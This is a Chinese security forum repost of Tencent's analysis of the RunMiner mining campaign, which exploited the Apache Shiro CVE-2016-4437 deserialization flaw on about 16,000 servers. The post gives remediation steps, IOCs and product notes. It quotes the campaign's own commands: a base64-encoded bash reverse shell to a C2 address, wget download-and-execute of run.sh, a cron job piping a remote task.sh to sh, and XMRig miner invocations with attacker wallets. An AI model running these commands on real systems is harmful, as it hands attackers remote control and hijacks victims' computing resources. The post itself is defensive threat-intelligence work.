查看: 20680|回复: 0
收起左侧

[技术原创] 腾讯主机安全(云镜)捕获RunMiner挖矿木马攻击,近2万台服务器沦陷

[复制链接]
腾讯电脑管家
发表于 2020-12-4 20:55:45 | 显示全部楼层 |阅读模式
本帖最后由 腾讯电脑管家 于 2020-12-4 20:57 编辑

一、概述
腾讯主机安全(云镜)捕获RunMiner挖矿木马利用Apache Shiro反序列化漏洞(CVE-2016-4437)攻击云服务器。RunMiner挖矿团伙入侵成功后会执行命令反弹shell连接到C2服务器对肉鸡系统进行远程控制,然后继续下载执行Run.sh,下载XMRig挖矿木马tcpp进行门罗币挖矿,病毒通过安装定时任务进行持久化。

根据RunMiner挖矿木马使用的门罗币钱包算力(约268.6KH/s)推算,该挖矿团伙已控制约16000台服务器执行挖矿任务。在黑客控制的服务器上还发现多个扫描探测、网络入侵和远程控制工具,该团伙显然是专业黑灰产经营团伙之一。

腾讯安全专家建议企业检查服务器是否部署低于1.2.5版本的Apache Shiro,并尽快将其升级到1.2.5及以上版本以修复漏洞。同时对以下位置进行检查,以删除挖矿木马安装的相关文件,结束挖矿进程,删除定时任务:
文件:
/tmp/tcpp
/tmp/.fsksdvsler/tcpp

定时任务:
/var/spool/cron/`whoami`(whoami为当前用户)
@daily wget -O - -q http[:]//45.14.150.62/task.sh | sh > /dev/null 2>&1

进程1:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMjEwLjE0My4xMDIvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}

进程2:
/tmp/tcpp --coin monero -o mine.c3pool.com:13333 -u 42JLDjTVemj7Gxv6krGmQ97HLEqaJC7sA3Ai8wkgL4WJSEjJ4qGmrdLjAs4rLMRrh6Bn7fWz9bD571iLcQmEj46A5CA21e5 -p y -k --donate-level=1 -B --cpu-max-threads-hint=50
/tmp/tcpp --coin monero -o mine.c3pool.com:13333 -u 44aaSGS1BGPiMaHeaytCHK4DDQjMtwoFsTiE5UCh3vNMXkXQ2odu5exHD4UCKA5GsGBZCQ2YV4uMY7nduQHiWBhFD5SND4x -p y -k --donate-level=1 -B --cpu-max-threads-hint=50
/tmp/tcpp --coin monero -o mine.c3pool.com:13333 -u 46YngqQEZQ6HYhqP7noesGdoecXZRM2jR16t7RKTbhW4TtqdKUQyggs3x7pADEWvpr5ySbesyQQwJfaHbewXurEWNdeWNtj -p x -k --donate-level=1 -B --cpu-max-threads-hint=70
/tmp/tcpp --coin monero -o xmr.f2pool.com:13531 -u 49TcGmxFmHXCueAHAHF3dPPn6KmFXbxMuZJszFkppnpXKXAceJ8jQ1xGTVMNgnpnwv7SrLZq6Yt5kA937MXUv4nWBN1D1DF.04 -p x -k --donate-level=1 -B --cpu-max-threads-hint=50

进程3:
/tmp/.fsksdvsler/tcpp --coin monero -o mine.c3pool.com:13333 -u 43arbEqHabLE2qZESVFq8G3wDH95putrkUHoYZkPZuH7ARUA6SS46uQaEzBFzVj8HLf2qUV5kz9MDUJmp5haD2fvFroxKiJ -p y -k --donate-level=1 -B --cpu-max-threads-hint=50

腾讯安全系列产品应对RunMiner挖矿木马的响应清单如下:
应用场景
安全产品
解决方案
腾讯T-Sec
威胁情报云查服务
(SaaS)
1)RunMiner挖矿团伙相关IOCs已入库。
各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics
腾讯T-Sec
高级威胁追溯系统
1)RunMiner挖矿团伙相关信息和情报已支持检索。
网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts
云原生安全
防护
云防火墙
(Cloud Firewall,CFW)
基于网络流量进行威胁检测与主动拦截,已支持:
1)RunMiner挖矿团伙关联的IOCs已支持识别检测;
2)检测Apache Shiro反序列化漏洞CVE-2016-4437利用。
有关云防火墙的更多信息,可参考:
https://cloud.tencent.com/product/cfw
腾讯T-Sec  主机安全
(Cloud Workload Protection,CWP)
1)已支持查杀RunMiner挖矿团伙相关木马程序;
腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp
腾讯T-Sec 安全运营中心
基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。
关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html
非云企业安全防护
腾讯T-Sec
高级威胁检测系统
(腾讯御界)
1)已支持通过协议检测RunMiner挖矿木马与服务器的网络通信;
2)支持检测Apache Shiro反序列化漏洞CVE-2016-4437利用;
关于T-Sec高级威胁检测系统的更多信息,可参考:
https://cloud.tencent.com/product/nta
更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/


二、详细分析
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。在Apache Shiro <=1.2.4版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。

攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞CVE-2016-4437,进而在目标机器上执行任意命令。
该漏洞利用POC已被公开:

攻击者批量扫描网站,并将精心构造的包含漏洞利用的数据包发送至目标服务器。

漏洞攻击成功后执行恶意命令。

首先执行一段Payload:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMjEwLjE0My4xMDIvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}

base64解密:
bash -i >& /dev/tcp/192.210.143.102/7777 0>&1
Payload通过反弹shell连接到C2地址(也就是攻击源IP):192.210.143.102:7777,之后黑客可通过192.210.143.102对中招机器进行完全控制。

然后执行另一段Payload下载run.sh:
wget -q http[:]//45.14.150.62/run.sh -O /tmp/run.sh ; chmod +x /tmp/run.sh ; sh /tmp/run.sh
run.sh下载shell脚本task.sh并云行,同时将其安装为定时任务每天执行一次
/var/spool/cron/`whoami`,其中whoami为当前用户。

接着task.sh下载门罗币挖矿木马tcpp到tmp目录并启动,挖矿使用矿池:
mine.c3pool.com:13333

使用钱包:
42JLDjTVemj7Gxv6krGmQ97HLEqaJC7sA3Ai8wkgL4WJSEjJ4qGmrdLjAs4rLMRrh6Bn7fWz9bD571iLcQmEj46A5CA21e5

tcpp采用开源挖矿程序xmrig编译生成。

腾讯安全专家在该挖矿团伙的多个入侵行动中发现该团伙使用了5个钱包,根据钱包算力总和268.6KH/s推算,该挖矿团伙已控制约16000台服务器进行挖矿。


三、其他黑客工具
在溯源的过程中,我们在黑客控制的服务器上发现多个文件,其中包含大量的扫描探测、网络入侵、远程控制、群发消息等黑客工具。

疑似失陷IP列表ip.txt,处于实时更新状态,目前已有2000多个IP。

SQL账号密码爆破入侵和执行shell工具:“SQL TOOLS 2.0功能增强版.exe”。

内网穿透工具frpc:

短信炸弹源码以及网络入侵工具Netcat:

网络发包代码post22.java:

数字加密货币余额查询代码search.class:

还发现有多个网站源码文件:

其中一个网站文件与数字加密货币相关平台“币成学院”有关联:

IOCs
IP
27.124.39.121
45.14.150.62
192.210.143.102

C2
192.210.143.102:7777
Md5
run.sh
52a5f931aa1933d80bb1eb3069450393
task.sh
b12919c28eb1025da125c56097574809
tcpp
ef2d9270085b7c0cfa3c56aff4a5c928
URL
http[:]//27.124.39.121:29324/ex/task.sh
http[:]//27.124.39.121:29324/ex/run.sh
http[:]//27.124.39.121:29324/ex/tcpp
http[:]//45.14.150.62/run.sh
http[:]//45.14.150.62/task.sh
http[:]//45.14.150.62/tcpp
钱包:
42JLDjTVemj7Gxv6krGmQ97HLEqaJC7sA3Ai8wkgL4WJSEjJ4qGmrdLjAs4rLMRrh6Bn7fWz9bD571iLcQmEj46A5CA21e5
44aaSGS1BGPiMaHeaytCHK4DDQjMtwoFsTiE5UCh3vNMXkXQ2odu5exHD4UCKA5GsGBZCQ2YV4uMY7nduQHiWBhFD5SND4x
46YngqQEZQ6HYhqP7noesGdoecXZRM2jR16t7RKTbhW4TtqdKUQyggs3x7pADEWvpr5ySbesyQQwJfaHbewXurEWNdeWNtj
49TcGmxFmHXCueAHAHF3dPPn6KmFXbxMuZJszFkppnpXKXAceJ8jQ1xGTVMNgnpnwv7SrLZq6Yt5kA937MXUv4nWBN1D1DF
43arbEqHabLE2qZESVFq8G3wDH95putrkUHoYZkPZuH7ARUA6SS46uQaEzBFzVj8HLf2qUV5kz9MDUJmp5haD2fvFroxKiJ

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-22 12:02 , Processed in 0.167835 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表